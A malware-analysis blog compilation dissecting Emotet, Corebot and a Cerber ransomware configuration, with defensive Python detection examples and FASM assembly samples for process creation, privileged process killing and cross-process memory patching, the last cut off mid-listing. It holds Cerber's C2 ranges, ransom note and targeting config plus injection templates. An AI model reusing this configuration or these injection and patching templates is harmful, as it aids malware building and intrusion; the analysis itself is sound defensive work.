Emotet Banking Trojan: Malware Analysis

Goal: Reverse the pervasive banking Trojan “Emotet.”

SHA-1: 2bda61456d64a2c509b19d49516f5c942be90d44
SHA256: 9bb033dc2815798cd2c8b1a496c319a190a29ca59ea1053ab0b6fcf809630036
Imphash: 4c523782bd5ed7ca8f9ac7efc2d8d75f
Other related samples based on the variant’s imphash:
  • 9bb033dc2815798cd2c8b1a496c319a190a29ca59ea1053ab0b6fcf809630036
  • 33441312c20fbeccffceb522e626aa47366a966c48be537d82d4ecc60858d14c
  • 3d41a652e368875bdf55653dc4c43237f4b0eb70c028fe43454be02309cfc11b
  • ff25f74c91530371232bb7f5350d14252499de9a748a5e76d4b40959e64cfd30
  • 8102bda902667eabb34ebaf84f6ff15fb01804811c4b5bc4d6ac1a3871ea985a
  • ae8ef4600413adc25b32d202a8e2a4042650c234cde969251861b9ea2b2391f9
  • f5b8507645d9a2b672515bc990d149566e6272802c339219c2bd9e0ee19a1b88
  • 38a7f6b64f72c9202489b7e028a65f19cf0ff7008de7330e9f6154223e7dda78
  • df277353e4ec5d69a24b570f31fbc2376f35e6e18457d1985f556efee633456c
Emotet queries HKCU and HKLM Shell Folder directories:
The malware copies itself into %APPDATA%\QuotaSms as “QuotaSms[.]exe”:
Emotet Trojan creates persistence as an lnk file in the Startup directory:
Emotet creates an identical process with “CREATE_SUSPENDED,” injects itself into it via WriteProcessMemory, resumes the new process with ResumeThread and kills the main process.

Dynamic Analysis: Emotet Trojan
+ Utilizes dynamic API loading via GetProcAddress
+ Implements a self-kill routine via CreateThread with WriteProcessMemory
+ Creates multiple suspended threads and writes the malware into them using WriteProcessMemory
+ Creates persistence as a QuotaSms[.]exe lnk file in the Startup directory
+ Copies itself into %APPDATA%
+ Queries an SSL server on :443 and gets assigned a peer on :8080

0027s > AnalyzeProcess pid:5600 C:\Documents and Settings\Administrator\Desktop\emotet[.]exe
0059s >  WriteProcessMemory
File: emotet[.]exe
Size: 216576 Bytes
MD5: BCCF2BBA9CD34B2FFFA13BFAA9DD73D0

Corebot Modular Trojan: Malware Analysis

Goal: Dissect modular Corebot banking Trojan with its DGA, rootkit, Powershell, runas, screenshot, process injection into svchost in SUSPENDED_MODE, and other modules.



SHA-1: f923923e7af017e77e80d57578cfd88b990ce1e5
SHA-256: 0ce3290ed92979a5f13fbb799d7128e9dbc579e3f1bea3b560551a73f482de8f
imphash: 63c53219cb193f80ff22f173a8ffef05
Size: 640.0 KB (655361 bytes)

Static Analysis: Corebot 
PDB: .rdata:00D14278 C:\\work\\itco\\core\\bin\\x86\\Release\\core[.]pdb\
Timestamp: Wed Oct 14 07:56:42 2015

Inject functions:


   
Powershell module (powershell[.]exe -NonInteractive -NoProfile -NoLogo -ExecutionPolicy Unrestricted -File “%s” via “cmd mode con cols=4000 lines=1000”):


Self-deletion batch script:

Runas as explorer[.]exe module:


User-mode rootkit module -> “\\\\.\\PhysicalDrive0”:



Xfer from the user-mode rootkit module routine:

DGA seed algorithm:

Create a process %WINDIR%\System32\svchost[.]exe with the CREATE_SUSPENDED flag. The primary thread of the new process is created in a suspended state, and does not run until the ResumeThread function is called.
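Both the Emotet write-up above (CREATE_SUSPENDED, WriteProcessMemory, ResumeThread, kill the original) and the Corebot svchost[.]exe step here describe the same suspended-process injection sequence. The following is an added example, not code from either write-up: a small trace analyser that reads API-log lines in the style of this page's sandbox output and reports every process that was created suspended, written to, and then resumed. The SAMPLE_TRACE lines, the log format and the function names are constructed for the example.

```python
"""Flag the create-suspended / WriteProcessMemory / ResumeThread chain.
Added example; SAMPLE_TRACE is constructed in the style of the page's API log."""
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # documented CreateProcess creation flag

# Constructed trace: "<time>s > <API>(<args>)[ = pid:<new pid>]".
# The first process is a textbook hollowing chain; the second is a benign
# write into a process that was never suspended and never resumed.
SAMPLE_TRACE = """\
0027s > CreateProcessA(lpApplicationName="C:\\Users\\victim\\AppData\\Roaming\\QuotaSms\\QuotaSms.exe", dwCreationFlags=0x4) = pid:5700
0031s > WriteProcessMemory(hProcess=pid:5700, lpBaseAddress=0x400000, nSize=0x34e00)
0032s > WriteProcessMemory(hProcess=pid:5700, lpBaseAddress=0x435000, nSize=0x1000)
0033s > ResumeThread(hThread=pid:5700)
0040s > CreateProcessA(lpApplicationName="C:\\Windows\\System32\\notepad.exe", dwCreationFlags=0x0) = pid:5800
0041s > WriteProcessMemory(hProcess=pid:5800, lpBaseAddress=0x7ffd0000, nSize=0x10)
"""

LINE_RE = re.compile(
    r"^(?P<t>\d+)s > (?P<api>\w+)\((?P<args>.*?)\)(?: = pid:(?P<newpid>\d+))?$")
PID_RE = re.compile(r"pid:(\d+)")
FLAGS_RE = re.compile(r"dwCreationFlags=(0x[0-9a-fA-F]+|\d+)")
IMAGE_RE = re.compile(r'lpApplicationName="([^"]*)"')


def parse_trace(text):
    """Split the log into dicts with keys t, api, args, newpid (None if absent)."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            events.append(m.groupdict())
    return events


def find_hollowing(text):
    """One finding per target PID that was created suspended, written to, then resumed."""
    state = defaultdict(lambda: {"suspended": False, "writes": 0,
                                 "resumed": False, "image": None})
    for ev in parse_trace(text):
        api, args = ev["api"], ev["args"]
        if api.startswith("CreateProcess") and ev["newpid"]:
            fm = FLAGS_RE.search(args)
            flags = int(fm.group(1), 0) if fm else 0
            s = state[ev["newpid"]]
            s["suspended"] = bool(flags & CREATE_SUSPENDED)
            im = IMAGE_RE.search(args)
            s["image"] = im.group(1) if im else None
        elif api == "WriteProcessMemory":
            pm = PID_RE.search(args)
            if pm:
                state[pm.group(1)]["writes"] += 1
        elif api == "ResumeThread":
            pm = PID_RE.search(args)
            if pm:
                state[pm.group(1)]["resumed"] = True
    return [{"pid": pid, "image": s["image"], "writes": s["writes"]}
            for pid, s in state.items()
            if s["suspended"] and s["writes"] and s["resumed"]]


if __name__ == "__main__":
    for hit in find_hollowing(SAMPLE_TRACE):
        print(f"suspended-inject-resume: pid {hit['pid']} ({hit['image']}), "
              f"{hit['writes']} WriteProcessMemory call(s)")
```

The check keys on the target PID rather than on the API names alone, so a WriteProcessMemory into a process that was never created suspended (the second process in the sample) is not reported; real sandbox logs would need the same normalisation of handle-to-PID mapping that the constructed `pid:` tokens stand in for here.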



Red Flags:
  • The file modifies the registry
  • The file references Alternate Data Stream (ADS)
  • The file is scored (40/54) by VirusTotal
  • The file references the Remote Desktop Session Host Server
  • The file references the Windows Native API
  • The file references the Security Descriptor Definition Language (SDDL)
  • The file references the Service Control Manager (SCM)
  • The file references the Desktop window
  • The file references the Windows Cryptographic interface
  • The file references the Windows Debug Helper interface
  • The file queries for files and streams
  • The file references the Event Log
  • The file references Inter-Process Communication (IPC)
  • The file references the Domain Name System (DNS) API 
  • The file references data on a Socket
  • The file references the RPC Network Data Representation (NDR) Engine
  • The file opts for Address Space Layout Randomization (ASLR)
  • The file opts for cookies on the stack (GS)
  • The file imports 2 decorated symbol(s)
  • The file has no Version
  • The file does not contain a digital certificate
  • The file checksum (0x00000000) is invalid
  • The debug file name (core[.]pdb) is different than the file name (corebot[.]exe)
Dynamic Analysis: Corebot

Mutexes
————————————————–

  • ::62DFDF4F-C9F7-4416-9688-41C7791D0C33  
  • {F4EE296B-9B08-4B04-8443-7E76A45FE740}


Process Analysis Log:
  • Process: svchost[.]exe
  • Size: 14336 Bytes
  • MD5: 27C6D03BCDB8CFEB96B716F3D8BE3E18

—————————————————————————                         

Monitored RegKeys
Path -> Value *
————————————————–
Path: HKCU\Software\Microsoft\Windows\CurrentVersion\Run –> Value: 1932a393-6ee2-a084-05de-868ddc92d287=C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\46604e10-2147-a135-0a93-c63f477cff8d\272f38ca-8023-4abc-a8f7-91009ce205a7[.]exe


Domain Generation Algorithm (DGA) resolution ending in *ddns[.]net:

Bot information collector procedure; the fields that form the request:
  • os_version
  • version
  • process_name
  • os_version_short
  • volume_sn
  • country_name
  • lang_name
  • default_browser
  • os_arch
  • is_admin
  • is_admin_group


05-22-2017 Reversing: Cerber Ransomware Configuration

Type: Ransomware
Variant: Cerber
Malware Source: 521089667da9de525381eb23c780ad8b3d6e64d9c95a71f10d8f6d4f2af1f561
Config Source: GitHub


Cerber Configuration:

I. [crbr]{"b":"17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt","i":"17513","o":"p27dokhpz2n7nvgr","p":["129p1t[.]top","1apgrn[.]top","1p5fwl[.]top","1cknbd[.]top","1fu8p3[.]top"]}[crbr]

II. {“blacklist“:{“extensions“:[“.bat”,”.cmd”,”.com”,”.cpl”,”.dll”,”.exe”,”.hta”,”.msc”,”.msi”,”.msp”,”.pif”,”.scf”,”.scr”,”.sys”],”files“:[“bootsect.bak”,”iconcache.db”,”ntuser.dat”,”thumbs.db”],”folders”:[“:\\$getcurrent\\”,”:\\$recycle.bin\\”,”:\\$windows.~bt\\”,”:\\$windows.~ws\\”,”:\\boot\\”,”:\\documents and settings\\all users\\”,”:\\documents and settings\\defaultuser\\”,”:\\documents and settings\\localservice\\”,”:\\documents and settings\\networkservice\\”,”:\\intel\\”,”:\\msocache\\”,”:\\perflogs\\”,”:\\program files (x86)\\”,”:\\program files\\”,”:\\programdata\\”,”:\\recovery\\”,”:\\recycled\\”,”:\\recycler\\”,”:\\system volume information\\”,”:\\temp\\”,”:\\windows.old\\”,”:\\windows10upgrade\\”,”:\\windows\\”,”:\\winnt\\”,”\\appdata\\local\\”,”\\appdata\\locallow\\”,”\\appdata\\roaming\\”,”\\local settings\\”,”\\public\\music\\sample music\\”,”\\public\\pictures\\sample pictures\\”,”\\public\\videos\\sample videos\\”,”\\tor browser\\”],”languages“:[1049,1058,1059,1064,1067,1068,1079,1087,1088,1090,1091,1092,2072,2073,2092,2115]},”check“:{“language“:1},”debug”:0,”default”:{“bchn“:”17gd1msp5FnMcEMF1MitTNSsYs7w7AQyCt”,”site_1“:”tor2web[.]org”,”site_2“:”onion[.]link”,”site_3“:”onion.nu”,”site_4“:”onion[.]cab”,”site_5“:”onion.to”,”tor“:”p27dokhpz2n7nvgr”},”encrypt“:{“bytes_skip“:1792,”divider“:262144,”encrypt“:1,”files”:[[“.123″,”.1cd”,”.3dm”,”.3ds”,”.3fr”,”.3g2″,”.3gp”,”.3pr”,”.602″,”.7z”,”7zip”,”.aac”,”.ab4″,”.abd”,”.acc”,”.accdb”,”.accde”,”.accdr”,”.accdt”,”.ach”,”.acr”,”.act”,”.adb”,”.adp”,”.ads”,”.aes”,”.agdl”,”.ai”,”.aiff”,”.ait”,”.al”,”.aoi”,”.apj”,”.apk”,”.arc”,”.arw”,”.ascx”,”.asf”,”.asm”,”.asp”,”.aspx”,”.asset”,”.asx”,”.atb”,”.avi”,”.awg”,”.back”,”.backup”,”.backupdb”,”.bak”,”.bank”,”.bat”,”.bay”,”.bdb”,”.bgt”,”.bik”,”.bin”,”.bkp”,”.blend”,”.bmp”,”.bpw”,”.brd”,”.bsa”,”.bz2″,”.c”,”.cash”,”.cdb”,”.cdf”,”.cdr”,”.cdr3″,”.cdr4″,”.cdr5″,”.cdr6″,”.cdrw”,”.cdx”,”.ce1″,”.ce2″,”.cer”,”.cfg”,”.cfn”,”.cgm”,”.cib”,”.class”,”.cls”,”.cmd”,”.cmt”,”.config”,”.co
ntact”,”.cpi”,”.cpp”,”.cr2″,”.craw”,”.crt”,”.crw”,”.cry”,”.cs”,”.csh”,”.csl”,”.csr”,”.css”,”.csv”,”.d3dbsp”,”.dac”,”.das”,”.dat”,”.db”,”.db3″,”.db_journal”,”.dbf”,”.dbx”,”.dc2″,”.dch”,”.dcr”,”.dcs”,”.ddd”,”.ddoc”,”.ddrw”,”.dds”,”.def”,”.der”,”.des”,”.design”,”.dc”,”.dgn”,”.dif”,”.dip”,”.dit”,”.djv”,”.djvu”,”.dng”,”.doc”,”.docb”,”.docm”,”.docx”,”.dot”,”.dotm”,”.dotx”,”.drf”,”.drw”,”.dtd”,”.dwg”,”.dxb”,”.dxf”,”.dxg”,”.edb”,”.eml”,”.eps”,”.erbsql”,”.erf”,”.exf”,”.fdb”,”.ffd”,”.fff”,”.fh”,”.fhd”,”.fla”,”.flac”,”.flb”,”.flf”,”.flv”,”.forge”,”.fpx”,”.frm”,”.fxg”,”.gbr”,”.gho”,”.gif”,”.gpg”,”.gray”,”.grey”,”.groups”,”.gry”,”.gz”,”.h”,”.hbk”,”.hdd”,”.hpp”,”.html”,”.hwp”,”.ibank”,”.ibd”,”.ibz”,”.idx”,”.iif”,”.iiq”,”.incps”,”.indd”,”.info”,”.info_”,”.iwi”,”.jar”,”.java”,”.jnt”,”.jpe”,”.jpeg”,”.jpg”,”.js”,”.json”,”.k2p”,”.kc2″,”.kdbx”,”.kdc”,”.key”,”.kpdx”,”.km”,”.laccdb”,”.lay”,”.lay6″,”.lbf”,”.lck”,”.ldf”,”.lit”,”.litemod”,”.litesql”,”.lock”,”.ltx”,”.lua”,”.m”,”.m2ts”,”.m3u”,”.m4a”,”.m4p”,”.m4u”,”.m4v”,”.ma”,”.mab”,”.mapimail”,”.max”,”.mbx”,”.md”,”.mdb”,”.mdc”,”.mdf”,”.mef”,”.mfw”,”.mid”,”.mkv”,”.mlb”,”.mml”,”.mmw”,”.mny”,”.money”,”.moneywell”,”.mos”,”.mov”,”.mp3″,”.mp4″,”.mpeg”,”.mpg”,”.mrw”,”.ms11″,”.msf”,”.msg”,”.mts”,”.myd”,”.myi”,”.nd”,”.ndd”,”.ndf”,”.nef”,”.nk2″,”.nop”,”.nrw”,”.ns2″,”.ns3″,”.ns4″,”.nsd”,”.nsf”,”.nsg”,”.nsh”,”.nvram”,”.nwb”,”.nx2″,”.nxl”,”.nyf”,”.oab”,”.obj”,”.odb”,”.odc”,”.odf”,”.odg”,”.odm”,”.odp”,”.ods”,”.odt”,”.ogg”,”.oil”,”.omg”,”.one”,”.onenotec2″,”.orf”,”.ost”,”.otg”,”.oth”,”.otp”,”.ots”,”.ott”,”.p12″,”.p7b”,”.p7c”,”.pab”,”.pages”,”.paq”,”.pas”,”.pat”,”.pbf”,”.pcd”,”.pct”,”.pdb”,”.pdd”,”.pdf”,”.pef”,”.pem”,”.pfx”,”.php”,”.pif”,”.pl”,”.plc”,”.plus_muhd”,”.pm”,”.pm!”,”.pmi”,”.pmj”,”.pml”,”.pmm”,”.pmo”,”.pmr”,”.pnc”,”.pnd”,”.png”,”.pnx”,”.pot”,”.potm”,”.potx”,”.ppam”,”.pps”,”.ppsm”,”.ppsx”,”.ppt”,”.pptm”,”.pptx”,”.prf”,”.private”,”.ps”,”.psafe3″,”.psd”,”.pspimage”,”.pst”,”.ptx”,”.pub”,”.pwm”,”.py”,”.qba”,”.qbb”,”.qbm”,”.qbr”,”.qbw”,”.qbx”,”.qby”,”.q
cow”,”.qcow2″,”.qed”,”.qtb”,”.r3d”,”.raf”,”.rar”,”.rat”,”.raw”,”.rb”,”.rdb”,”.re4″,”.rm”,”.rtf”,”.rvt”,”.rw2″,”.rwl”,”.rwz”,”.s3db”,”.safe”,”.sas7bdat”,”.sav”,”.save”,”.say”,”.sch”,”.sd0″,”.sda”,”.sdb”,”.sdf”,”.secret”,”.sh”,”.sldm”,”.sldx”,”.slk”,”.slm”,”.sql”,”.sqlite”,”.sqlite-shm”,”.sqlite-wal”,”.sqlite3″,”.sqlitedb”,”.sr2″,”.srb”,”.srf”,”.srs”,”.srt”,”.srw”,”.st4″,”.st5″,”.st6″,”.st7″,”.st8″,”.stc”,”.std”,”.sti”,”.stl”,”.stm”,”.stw”,”.stx”,”.svg”,”.swf”,”.sxc”,”.sxd”,”.sxg”,”.sxi”,”.sxm”,”.sxw”,”.tar”,”.tax”,”.tbb”,”.tbk”,”.tbn”,”.tex”,”.tga”,”.tgz”,”.thm”,”.tif”,”.tiff”,”.tlg”,”.tlx”,”.txt”,”.uop”,”.uot”,”.upk”,”.usr”,”.vb”,”.vbox”,”.vbs”,”.vdi”,”.vhd”,”.vhdx”,”.vmdk”,”.vmsd”,”.vmx”,”.vmxf”,”.vob”,”.vpd”,”.vsd”,”.wab”,”.wad”,”.wallet”,”.war”,”.wav”,”.wb2″,”.wk1″,”.wks”,”.wma”,”.wmf”,”.wmv”,”.wpd”,”.wps”,”.x11″,”.x3f”,”.xis”,”.xla”,”.xlam”,”.xlc”,”.xlk”,”.xlm”,”.xlr”,”.xls”,”.xlsb”,”.xlsm”,”.xlsx”,”.xlt”,”.xltm”,”.xltx”,”.xlw”,”.xml”,”.xps”,”.xxx”,”.ycbcra”,”.yuv”,”.zip”]],”max_block_size“:128,”min_file_size“:2048,”multithread“:1,”network“:1,”rsa_key_size“:880,”threads_per_core“:1},”files_name“:”_R_E_A_D___T_H_I_S___{RAND}_”,”run_by_the_end”:1},”self_deleting“:1,”servers“:{“statistics”:{“data_finish“:”e01ENV9LRVl9″,”data_start“:”e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=”,”ip“:[“178[.]33[.]158[.]0/27″,”178[.]33[.]159[.]0/27″,”178[.]33[.]160[.]0/22″],”port“:6893,”send_stat“:1,”timeout“:255}},”wallpaper“:{“change_wallpaper”:1,”background“:139,”color“:16777215,”size“:13,”text“:”                     \n  CERBER RANSOMWARE  \n                     \n\n  YOUR DOCUMENTS, PHOTOS, DATABASES AND OTHER IMPORTANT FILES  \n  HAVE BEEN ENCRYPTED!  \n\n  The only way to decrypt your files is to receive  \n  the private key and decryption program.  
\n\n  To receive the private key and decryption program  \n  go to any decrypted folder – inside there is the special file (*_READ_THIS_FILE_*)  \n  with complete instructions how to decrypt your files.  \n\n  If you cannot find any (*_READ_THIS_FILE_*) file at your PC,  \n  follow theinstructions below:  \n\n  1. Download \”Tor Browser\” from https://www.torproject%5B.%5Dorg/ and install it.  \n  2. In the \”Tor Browser\” open your personal page here:  \n\n  http://{TOR}.onion/{PC_ID}  \n\n  Note! This page is available via \”Tor Browser\”only.  \n\n\n”},”
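The configuration above is useful to a defender beyond its IoCs: it tells you which files the sample would touch, which locale it refuses to run under, and where its statistics traffic goes. The following added example (not part of the original post) turns those parts of the config into checks. CERBER_CFG is a hand-trimmed excerpt of the page's configuration with the same keys and values but shortened lists, so it is constructed; the function names are the example's own.

```python
"""Checks derived from the Cerber configuration on this page.
Added example; CERBER_CFG is a shortened excerpt of the page's config."""
import base64
import ipaddress
import os

CERBER_CFG = {
    "blacklist": {
        "extensions": [".bat", ".cmd", ".com", ".cpl", ".dll", ".exe", ".msi", ".scr", ".sys"],
        "files": ["bootsect.bak", "iconcache.db", "ntuser.dat", "thumbs.db"],
        "folders": [":\\windows\\", ":\\program files\\", ":\\program files (x86)\\",
                    "\\appdata\\local\\", "\\appdata\\roaming\\", "\\tor browser\\"],
        "languages": [1049, 1058, 1059, 1064, 1067, 1068, 1079, 1087, 1088,
                      1090, 1091, 1092, 2072, 2073, 2092, 2115],
    },
    "check": {"language": 1},
    "encrypt": {
        "files": [[".bat", ".doc", ".docx", ".jpg", ".pdf", ".txt", ".xlsx", ".zip"]],
        "min_file_size": 2048,
        "rsa_key_size": 880,
    },
    "servers": {
        "statistics": {
            "data_start": "e01ENV9LRVl9e1BBUlRORVJfSUR9e09TfXtJU19YNjR9e0lTX0FETUlOfXtDT1VOVF9GSUxFU317U1RPUF9SRUFTT059e1NUQVRVU30=",
            "data_finish": "e01ENV9LRVl9",
            "ip": ["178[.]33[.]158[.]0/27", "178[.]33[.]159[.]0/27", "178[.]33[.]160[.]0/22"],
            "port": 6893,
        }
    },
}


def decode_stat_templates(cfg):
    """The statistics fields are base64 of a template made of {PLACEHOLDER} tokens."""
    st = cfg["servers"]["statistics"]
    return {k: base64.b64decode(st[k]).decode("ascii") for k in ("data_start", "data_finish")}


def statistics_blocklist(cfg):
    """Un-defang the CIDR list and summarise it for a firewall rule."""
    st = cfg["servers"]["statistics"]
    nets = [ipaddress.ip_network(c.replace("[.]", ".")) for c in st["ip"]]
    return {"port": st["port"],
            "networks": [str(n) for n in nets],
            "addresses": sum(n.num_addresses for n in nets)}


def is_skipped_language(cfg, lcid):
    """True when the 'check.language' gate would stop the sample on this LCID."""
    return bool(cfg["check"]["language"]) and lcid in cfg["blacklist"]["languages"]


def would_encrypt(cfg, path, size):
    """Apply the blacklist and encrypt sections in the order a file walker would."""
    p = path.lower().replace("/", "\\")
    name = p.rsplit("\\", 1)[-1]
    ext = os.path.splitext(name)[1]
    bl, enc = cfg["blacklist"], cfg["encrypt"]
    if size < enc["min_file_size"]:
        return False
    if name in bl["files"] or ext in bl["extensions"]:
        return False
    if any(folder in p for folder in bl["folders"]):
        return False
    targets = {e for group in enc["files"] for e in group}
    return ext in targets


if __name__ == "__main__":
    print(decode_stat_templates(CERBER_CFG))
    print(statistics_blocklist(CERBER_CFG))
    print(would_encrypt(CERBER_CFG, "C:\\Users\\bob\\Documents\\report.docx", 4096))
```

Note that ".bat" appears in both the blacklist extensions and the encrypt list in the page's config; the blacklist is applied first here, so such a file is left alone. The decoded `data_start` template shows the fields the sample reports back, which is what you would look for when writing a network signature for the statistics traffic.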


FASM: Flat Assembler, also known as "FASM": Sample Code

Goal: Enrich my own understanding of Flat Assembler (FASM) code constructs to enhance malware analysis and forward-engineering skills, especially with PE files. I find it extremely helpful to have code samples ready to use and analyze.
Source: Betamaster

Why FASM?
FASM is a 32-bit, open-source, cross-platform assembler targeting the IA-32 and x86-64 architectures (in addition, FASMARM, an unofficial port of FASM, targets the ARM architecture). It is very lightweight, fast, and rather simple to use for Windows API programming.

I. Simple Application: Hello World

format PE console
entry start
 
include 'win32a.inc'
 
;======================================
section '.data' data readable writeable
;======================================
 
hello_newline    db "Hello World!",10,0
hello_no_newline db "Hello World! (without a new line)",0
 
;=======================================
section '.code' code readable executable
;=======================================
 
start:
 
        ccall   [printf],hello_newline      ; Print 'Hello World!' and start a new line.
        ccall   [printf],hello_no_newline   ; Print 'Hello World!' without starting a new line.
 
        ccall   [getchar]                   ; I added this line to exit the application AFTER the user pressed any key.
        stdcall [ExitProcess],0             ; Exit the application
 
;====================================
section '.idata' import data readable
;====================================
 
library kernel,'kernel32.dll',\
        msvcrt,'msvcrt.dll'
 
import  kernel,\
        ExitProcess,'ExitProcess'
 
import  msvcrt,\
        printf,'printf',\
        getchar,'_fgetchar'


II. Create a process


format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
start:
 mov    [StartupInfo.cb],sizeof.STARTUPINFO         ; CreateProcess requires cb to hold the structure size
 invoke CreateProcessA,txt_location,0,0,0,0,CREATE_NEW_CONSOLE,0,0,StartupInfo,ProcessInfo
 test   eax,eax                                     ; EAX == 0 : CreateProcess failed, there are no handles to close
 jz     .done
 invoke CloseHandle,[ProcessInfo.hProcess]          ; We don't use the new process's handles, so release them
 invoke CloseHandle,[ProcessInfo.hThread]
.done:
 invoke ExitProcess,0                               ; ExitProcess takes an exit code; a bare call [ExitProcess] pushes none
 
; Custom Data: Contains the location of notepad.exe, StartupInfo and ProcessInfo:
section '.data' data readable writeable
 txt_location db 'C:\Windows\System32\notepad.exe',0
 StartupInfo STARTUPINFO
 ProcessInfo PROCESS_INFORMATION
 
; Imported functions and corresponding names of DLL files:
section '.idata' import data readable writeable
 library kernel,'KERNEL32.DLL'
 
 import kernel,\
 CreateProcessA,'CreateProcessA',\
 CloseHandle,'CloseHandle',\
 ExitProcess,'ExitProcess'


III. Kill a process

format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
start:
        invoke GetCurrentProcess                                                ; Retrieve a pseudo handle for current process
        invoke OpenProcessToken,eax,TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES,phToken ; Open access token associated with this process
        invoke LookupPrivilegeValue,0,Privilege ,pLocalId                       ; Retrieve the locally unique identifier (LUID)
        mov    [PrivilegeCount],1                                               ; [PrivilegeCount] = 1
        mov    [Attributes],2                                                   ; [Attributes]     = 2
        invoke AdjustTokenPrivileges,[phToken],0,PrivilegeCount ,0,0,0          ; Enable privileges on our token
 
        mov    [prcs.dwSize],sizeof.PROCESSENTRY32                              ; Store the required size of PROCESSENTRY32 in prcs.dwSize
        invoke CreateToolhelp32Snapshot, TH32CS_SNAPPROCESS, 0                  ; Take a snapshot of the specified processes (get all running processes)
        mov    [hSnapshot], eax                                                 ; Save the snapshot handle
        invoke Process32First,[hSnapshot],prcs                                  ; Retrieve information about the first process encountered in our system snapshot
.loop:
        mov    edi,PrcList                                                      ; EDI = filename of process we want to kill
        invoke StrStrI,prcs.szExeFile, edi                                      ; Compare the current process name with the one we want to kill
        cmp    eax,0                                                            ; - || -
        je     .next                                                            ; Jump = Not equal, continue with the next process
        call   kill                                                             ; Else : Kill the process
.next:
        invoke Process32Next,[hSnapshot],prcs                                   ; Retrieve the next process in our snapshot
        cmp    eax,0                                                            ; Check if there are still processes we didn't check
        jne    .loop                                                            ; Jump = Continue the loop with the current process
        invoke ExitProcess,0                                                    ; Else : No more processes. Exit.
kill:
        invoke OpenProcess,PROCESS_TERMINATE,0,[prcs.th32ProcessID]             ; Open the process with terminate privileges
        test   eax,eax                                                          ; EAX == 0 : OpenProcess failed (e.g. access denied), skip it
        jz     .done
        push   eax                                                              ; Keep the handle on the stack as the argument for CloseHandle below
        invoke TerminateProcess,eax,0                                           ; Terminate it (Kill process); EAX still holds the handle when pushed
        call   [CloseHandle]                                                    ; Close the handle pushed above (stdcall: the callee removes it)
.done:
        retn                                                                    ; And return to the loop
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
TOKEN_QUERY_TOKEN_ADJUST_PRIVILEGES =28h
TH32CS_SNAPPROCESS = 2
 
struct PROCESSENTRY32
        dwSize dd ?
        cntUsage dd ?
        th32ProcessID dd ?
        th32DefaultHeapID dd ?
        th32ModuleID dd ?
        cntThreads dd ?
        th32ParentProcessID dd ?
        pcPriClassBase dd ?
        dwFlags dd ?
        szExeFile db 260 dup(?)
ends
 
PrivilegeCount dd ?                                     ; These three fields together form a TOKEN_PRIVILEGES structure
pLocalId       dq ?                                     ; A LUID is 8 bytes; with only a dd here LookupPrivilegeValue would overwrite Attributes
Attributes     dd ?                                     ; SE_PRIVILEGE_ENABLED = 2
phToken        dd ?
hSnapshot      dd ?
prcs           PROCESSENTRY32
 
PrcList        db 'calc.exe',0
Privilege      db 'SeDebugPrivilege',0
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                advapi32,'ADVAPI32.DLL',\
                shlwapi,'SHLWAPI.DLL'
 
include 'API\kernel32.inc'
include 'API\advapi32.inc'
 
; StrStrI is exported by shlwapi.dll (as StrStrIA), not by shell32.dll
import          shlwapi,\
                StrStrI,'StrStrIA'


III. WriteProcessMemory

format PE GUI 4.0
entry start
 
include 'win32a.inc'
 
;================== code =====================
section '.code' code readable executable
;=============================================
 
proc start
 
        invoke FindWindow, NULL, WindowTitle           ; Find the window titled 'Notepad'
        test eax,eax                                   ; Test whether a window with that title was found or not
        jnz .ju1                                       ; Don't jump = The window was not found
        invoke MessageBox,0, message1, caption, MB_OK  ; - Display an error message (Window not found)
        jmp .exit                                      ; - Exit the application
.ju1:                                                  ; Jumped     = The window was found
        invoke GetWindowThreadProcessId, eax, ProcID   ; Get the ProcessID via the window handle
        invoke OpenProcess, 0x1F0FFF, FALSE, [ProcID]  ; Open the process using PROCESS_ALL_ACCESS (0x1F0FFF) and get a handle
        mov dword[ProcHandle],eax                      ; Save the handle
 
        ; VirtualAllocEx: Reserves/commits a region of memory within the virtual address space of out target process
        ; We should do this in order to avoid potential access violations (which might cause crashes)
        invoke VirtualAllocEx,dword [ProcHandle], 0, patchSize, MEM_COMMIT, PAGE_READWRITE
        cmp eax, 0                                     ; EAX == 0 : Failed to reserve the memory region
        jnz .cont                                      ; EAX != 0 : Continue with further steps
        invoke MessageBox,0, message4, caption, MB_OK  ; Display an error: VirtualAllocEx failed to reserve the memory region
        jmp .exit                                      ; Exit the application
.cont:
        invoke WriteProcessMemory, dword[ProcHandle], dword[startAddress], patchBytes, patchSize, patchResult
        cmp [patchResult],patchSize                    ; Compare the number of patched bytes with the length of our new bytes
        je .ju2                                        ; Don't jump = Failed to patch the target
        invoke MessageBox,0, message3, caption, MB_OK  ; - Display an error message (An error occurred)
        jmp .exit                                      ; - Exit the application
.ju2:                                                  ; Jumped     = Target patched successfully.
        invoke MessageBox,0, message2, caption, MB_OK  ; Display: The target has been patched successfully
.exit:                                                 ; Jumper: Here we're going to exit our application
        invoke  ExitProcess, 0                         ; ExitProcess
 
endp
 
;=================== data ====================
section '.data' data readable writeable
;=============================================
 
WindowTitle     db 'Notepad', 0                        ; Holds the window title   of the target application
ProcID          dd ?                                   ; Holds the process ID     of the target application
ProcHandle      dd ?                                   ; Holds the process handle of the target application (a dword, it is written with mov dword[ProcHandle])
 
caption         db 'Information', 0                    ; The caption displayed in all MessageBoxes
message1        db 'Unable to find the window', 0      ; Message: Window not found
message2        db 'Patched successfully',0            ; Message: Target patched successfully
message3        db 'Patching: An error occurred',0     ; Message: An error occurred while patching the target
message4        db 'VirtualAllocEx failed',0           ; Message: Failed to successfully execute VirtualAllocEx
 
startAddress    dd 0x00401090                          ; The memory address we're starting to write from
patchBytes      db 0x2F,0x66                           ; These bytes will be written into the memory of our target executable
patchSize       =  $ - patchBytes                      ; Holds the number of bytes we're going to write
patchResult     dd ?                                   ; Holds the number of successfully written bytes
 
;=============================================
section '.idata' import data readable
;=============================================
 
library         kernel32,'KERNEL32.DLL',\
                user32,'USER32.DLL'
 
import          kernel32,\
